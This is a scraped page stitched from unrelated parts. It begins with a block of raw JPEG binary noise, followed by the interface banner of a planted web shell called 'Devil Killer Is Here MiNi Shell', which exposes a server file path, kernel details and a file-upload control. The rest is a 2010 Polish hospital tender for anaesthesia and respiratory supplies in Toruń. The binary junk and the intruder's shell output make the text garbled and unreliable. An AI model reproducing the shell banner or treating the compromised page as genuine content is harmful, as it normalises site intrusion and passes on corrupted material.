JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100708/200950-N-2010.html

<p class="kh_header"><b>Toruń: Dostawa sprzętu anestezjologicznego jednorazowego użytku oraz sprzętu wymiennego.</b><br>
<b>Numer ogłoszenia: 200950 - 2010; data zamieszczenia: 08.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bielany.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu anestezjologicznego jednorazowego użytku oraz sprzętu wymiennego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu anestezjologicznego jednorazowego użytku oraz sprzętu wymiennego z podziałem na 3 zadania.<br>
Zadanie Nr 1:<br>
1. Czujnik tlenowy do aparatu do znieczulania Aespire Datex - 5 szt.;<br>
2. Czujnik tlenowy do aparatu do znieczulania EXELL 210 - 2 szt.;<br>
3. Pułapka wodna wielorazowa czarna 1 opak.=10 sztuk do modułów M-CAIOV - 1 op.;<br>
4. Pułapka wodna wielorazowa zielona 1 opak.=10 sztuk do modułów M-CAIOV - 1 op.;<br>
5. Pułapka wodna mini D-fend czarna, 1 opak.=10 sztuk do modułów M-MINIC - 10 op.;<br>
6. Zastawka wydechowa do respiratora Engstroem - 4 szt.;<br>
7. Kabel pacjenta do pomiaru EKG z pięciu odprowadzeń, do zapinania na elektrodach - 10 szt.;<br>
8. Kabel główny, połączeniowy do pomiaru EKG z pięciu odprowadzeń - 20 szt.;<br>
9. Mankiet dla dorosłych standard Dura-cuf, wszystkie rozmiary - 30 szt.;<br>
10. Czujnik do pomiaru SpO2 typu klips na palec, z kablem połączeniowym do monitorów DATEX-Ohmeda, komplet, 4m długości - 20 kpl.;<br>
11. Czujnik temperatury cieczy wstrzykiwanej - 1 szt.;<br>
12. Czujnik przepływu tlenu OZIRIS 3 - 2 szt.;<br>
13. Zastawka wydechowa do OZRIS 3 - 2 szt.;<br>
14. Zestaw akcesoriów do pomiarów spirometrycznych i gazowych - 5 szt.;<br>
15. Wielorazowy pojemnik wapno do aparatu do znieczulania Aespire Datex Ohmeda - 2 szt.;<br>
16. Wielorazowy pojemnik wapno do aparatu do znieczulania Leon Heinen + Lowenstein - 2 szt.;<br>
17. Czujnik przeplywu gazu do aparatu do znieczulania Aespire Datex Ohmeda - 10 szt.;<br>
18. Czujnik przeplywu gazu do aparatu do znieczulania Leon Heinen + Lowenstein - 10 szt.;<br>
19. Czujnik tlenowy do aparatu do znieczulania Aespire Datex - 10 szt.;<br>
20. Czujnik tlenowy do aparatu do znieczulania Leon - Heinen+ Loewenstein - 10 szt.;<br>
21. Mankiet infuzyjny 500-1000ml do szybkich przetoczeń - 10 szt.;<br>
22. Czujnik, sonda do pomiaru temperatury, skórna - 30 szt.;<br>
23. Linia monitorująca gazy oddechowe do aparatu Aespire firmy Datex Ohmeda - 300 szt.<br>
Zadanie Nr 2:<br>
1. Zestaw do drenażu opłucnej z zastawką Pleura-Seal, 8FR/19CM - 10 szt.;<br>
2. Zestaw do ciągłego znieczulenia splotów nerwowych, 19Ga - 10 szt.;<br>
3. Zestaw do znieczuleń zewnątrzoponowych, 19Ga - 80 szt.;<br>
4. Cewnik do tonometrii - 5 szt.<br>
5. Cewnik do tunelizacji żyły centralnej 1-światłowy, od 14Ga/20cm do 16 Ga/20 cm - 400 szt.;<br>
6. Zestaw do pomiaru PICCO2 do tętnicy udowej z przetwornikiem - 25 szt.;<br>
7. Zestaw do kaniulacji żył centralnych. W skład zestawu wchodzi : igła punkcyjna 18Ga/6,35 cm, prowadnik 2-światłowy cewnik z powłoką antybakteryjną (chlorheksadyna, sulfadiazyna srebra) , strzykawka z otworem w tłoku 5 ml, rozszerzadła, skrzydełka mocujące, igła do kontroli ciśnienia - 200 szt.;<br>
8. Zestaw do kaniulacji żył centralnych. W skład zestawu wchodzi : igła punkcyjna 18Ga/6,35 cm, prowadnik 3-światłowy cewnik z powłoką antybakteryjną (chlorheksadyna, sulfadiazyna srebra) , strzykawka z otworem w tłoku 5 ml, rozszerzadła, skrzydełka mocujące, igła do kontroli ciśnienia - 300 szt.;<br>
9. Zestaw do kaniulacji żył centralnych, w skład zestawu wchodzi igła punkcyjna 18Ga/6,35 cm, prowadnik, 5-światłowy cewnik, strzykawka 5 ml, rozszerzadło, skrzydełka mocujące - 30 kpl.;<br>
10. Przetwornik do pomiaru ciśnienia krwi typu Transpac IV do monitorów Datek Ohmeda, 60inch. (Kompleksowa linia pomiarowa winna mieć najwyższą częstotliwość własną w celu wyeliminowania zakłóceń rezonansowych) - 300 szt.;<br>
11. Przedłużacz z obrotowym złączem kolanowym z portem do bronchoskopii o śr.9,5mm, 22F/15F - 300 szt.;<br>
12. Przedłużacz do rurki intubacyjnej z rury elastycznej z obrotowym złączem, z portem do odsysania wydzieliny, 22FM/15F - 300 szt.;<br>
13. Przedłużacz do rurki intubacyjnej rozciągany z portem kapno (luer-luck), 22M/15F - 2500 szt.;<br>
14. Wymiennik ciepła i wilgoci do rurek tracheostomijnych z możliwością odsysania i portem kapno, 22M/15F - 700 szt.;<br>
15. Filtr oddechowy mechaniczny p/bakteryjny antywirusowy z portem kapno, 22F/15M-22M/15F - 4000 szt.;<br>
16. Filtr oddechowy p/bakteryjny antywirusowy z wymiennikiem ciepła i wilgoci z portem kapno, 22F/15M-22M/15F - 1600 szt.;<br>
17. Rura anestetyczna silikonowa 60cm - 6 szt.;<br>
18. Rura anestetyczna silikonowa 80cm - 10 szt.;<br>
19. Rura anestetyczna silikonowa 150cm - 10 szt.;<br>
20. Maska anestetyczna rozm. 2,3,4 - 30 szt.;<br>
21. Maska krtaniowa - wszystkie rozmiary - 100 szt.;<br>
22. Maska krtaniowa żelowa - wszystkie rozmiary - 30 szt.;<br>
23. Worek oddechowy 0,5l - 4 szt.;<br>
24. Worek oddechowy  2l - 6 szt.;<br>
25. Worek oddechowy  3l - 6 szt.;<br>
26. Jednorazowy układ okrężny dla dorosłych o regulowanej długości i pamięci kształtu do aparatów do znieczuleń w skład którego wchodzą:<br>
- dwie rury rozciągalne  z pamięcią kształtu o zakresie kompresji 42cm-200cm z zakończeniem 22F od strony respiratora<br>
- zintegrowany z rurami łącznik Y oraz odłączalny łącznik L z portem luer lock wyposażonym w bezpieczny kapturek na lince, od strony pacjenta zakończenie 22M/15F<br>
- dodatkowa rozciągalna gałąź o długości 1,5 m po rozciągnięciu z zakończeniem 22F po obu stronach<br>
- krótki łącznik 22M/22M<br>
- bezlateksowy worek oddechowy o pojemności 2l - 3000 szt.;<br>
27. Podstawowy układ oddechowy do respiratora o długości 1,6 m i średnicy 22mm - 300 szt.;<br>
28. Obwód oddechowy jednorazowego użytku do respiratora dla dorosłych z powłoką antybakteryjną składający się z dwóch rur karbowanych, z 2 portami oraz kolankiem - 100 szt.;<br>
29. Maska tlenowa wszystkie rozmiary - 300 szt.;<br>
30. Dren tlenowy 4m - 300 szt.;<br>
31. Kanister wielorazowy 2l do systemu Receptal - 15 szt.;<br>
32. Kanister wielorazowy 1l do systemu Receptal - 10 szt.<br>
33. Worek 2l do systemu Receptal 2000 - 1300 szt.;<br>
34. Worek 1l do systemu Receptal 2000 - 700 szt.;<br>
35. Dren do systemu Receptal	 - 2000 szt.;<br>
36. Strzykawka do gazometrii - 2000 szt.;<br>
37. Cewnik tlenowy donosowy dla dorosłych z wypustkami zakrzywionymi/rozszerzonymi z drenem na głowę, długość 1,5 m - 1500 szt.;<br>
38. Łącznik Y wielorazowy - 50 szt.;<br>
Zadanie Nr 3:<br>
1. Zestawy przezroczyste do przetaczania płynów infuzyjnych kompatybilne z pompą infuzyjną Lc-5000/PLUM A+ - 1800 szt.;<br>
2. Zestawy do przetaczania krwi kompatybilne z pompą PLUM A+ - 400 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku posiadania uprawnień do wykonywania określonej działalności lub czynności Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych min. 3 dostaw sprzętu medycznego o wartości min. dla poszczególnych zadań:<br>
- Zadanie Nr 1 - 66.318,00 zł,<br>
- Zadanie Nr 2 - 120.626,00 zł,<br>
- Zadanie Nr 3 - 26.784,00 zł brutto każda dostawa w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 3 dokumentów potwierdzający, że te dostawy zostały wykonane należycie.<br>
Wykonawca składający ofertę np. na Zadanie Nr 1 i Nr 2 musi wykazać się zrealizowanymi 3 dostawami o wymaganej wartości łącznej równej sumie tych zadań, tj. 186.944,00 zł każda dostawa.<br>
Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania odpowiednim potencjałem technicznym Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty dla poszczególnych zadań:<br>
- Zadanie Nr 1 - 44.212,00 zł,<br>
- Zadanie Nr 2 - 80.418,00 zł,<br>
- Zadanie Nr 3 - 17.856,00 zł,<br>
wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;<br>
/Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku udziału/.<br>
Wykonawca składający ofertę na kilka zadań musi załączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej o wymaganej wartości łącznej równej sumie poszczególnych zadań, których dotyczy oferta.<br>	
Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br>
Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego Wykonawca winien dostarczyć:<br>
a/ wpis do Rejestru Wyrobów Medycznych lub deklarację zgodności CE potwierdzającą, że oferowany wyrób medyczny spełnia wymagania określone w ustawie z dnia 20 kwietnia 2004 r. o wyrobach medycznych (Dz. U. z 2004 r. Nr 93, poz. 896 z późn. zm.);<br>
b/ foldery, katalogi/ prospekty oferowanego przedmiotu zamówieniu.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.<br>
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonych przez Zamawiającego warunków udziału.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość aneksowania terminu obowiązywania umowy w przypadku niezrealizowania jej pod względem ilościowym w obowiązującym terminie umownym oraz aneksowania ceny brutto w przypadku zmiany urzędowej stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bielany.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.szpital-bielany.torun.pl lub Wojewódzki Szpital Zespolony im. Ludwika Rydygiera ul. Św. Józefa 53/59, 87-100 Toruń, Dział Zamówień Publicznych - pokój nr 2..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2010 godzina 09:30, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawca na żądanie Zamawiającego i w zakresie przez niego wskazanym jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert spełnianie warunków, o których mowa w art. 22 ust. 1, i brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Czujnik tlenowy do aparatu do znieczulania Aespire Datex - 5 szt.;<br>
2. Czujnik tlenowy do aparatu do znieczulania EXELL 210 - 2 szt.;<br>
3. Pułapka wodna wielorazowa czarna 1 opak.=10 sztuk do modułów M-CAIOV - 1 op.;<br>
4. Pułapka wodna wielorazowa zielona 1 opak.=10 sztuk do modułów M-CAIOV - 1 op.;<br>
5. Pułapka wodna mini D-fend czarna, 1 opak.=10 sztuk do modułów M-MINIC - 10 op.;<br>
6. Zastawka wydechowa do respiratora Engstroem - 4 szt.;<br>
7. Kabel pacjenta do pomiaru EKG z pięciu odprowadzeń, do zapinania na elektrodach - 10 szt.;<br>
8. Kabel główny, połączeniowy do pomiaru EKG z pięciu odprowadzeń - 20 szt.;<br>
9. Mankiet dla dorosłych standard Dura-cuf, wszystkie rozmiary - 30 szt.;<br>
10. Czujnik do pomiaru SpO2 typu klips na palec, z kablem połączeniowym do monitorów DATEX-Ohmeda, komplet, 4m długości - 20 kpl.;<br>
11. Czujnik temperatury cieczy wstrzykiwanej - 1 szt.;<br>
12. Czujnik przepływu tlenu OZIRIS 3 - 2 szt.;<br>
13. Zastawka wydechowa do OZRIS 3 - 2 szt.;<br>
14. Zestaw akcesoriów do pomiarów spirometrycznych i gazowych - 5 szt.;<br>
15. Wielorazowy pojemnik wapno do aparatu do znieczulania Aespire Datex Ohmeda - 2 szt.;<br>
16. Wielorazowy pojemnik wapno do aparatu do znieczulania Leon Heinen + Lowenstein - 2 szt.;<br>
17. Czujnik przeplywu gazu do aparatu do znieczulania Aespire Datex Ohmeda - 10 szt.;<br>
